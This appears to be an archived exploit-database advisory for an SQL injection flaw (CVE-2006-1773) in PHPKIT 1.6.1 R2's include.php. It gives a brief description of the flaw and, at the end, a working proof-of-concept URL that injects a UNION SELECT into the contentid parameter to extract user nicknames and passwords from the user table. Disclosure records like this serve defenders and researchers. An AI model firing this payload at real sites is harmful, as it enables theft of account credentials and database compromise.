PHPKIT 1.6.1 R2 - 'Include.php' SQL Injection

Author: Hamid Ebadi
type: webapps
platform: php
port: 
date_added: 2006-04-11  
date_updated: 2013-08-16  
verified: 1  
codes: CVE-2006-1773;OSVDB-24574  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 27624.txt  
source: https://www.securityfocus.com/bid/17467/info

PHPKIT is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/phpkit/include.php?path=content/news.php&contentid=-24'%20union%20select%201,2,3,user_status,5,user_nick,user_pw,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20phpkit_user%20/*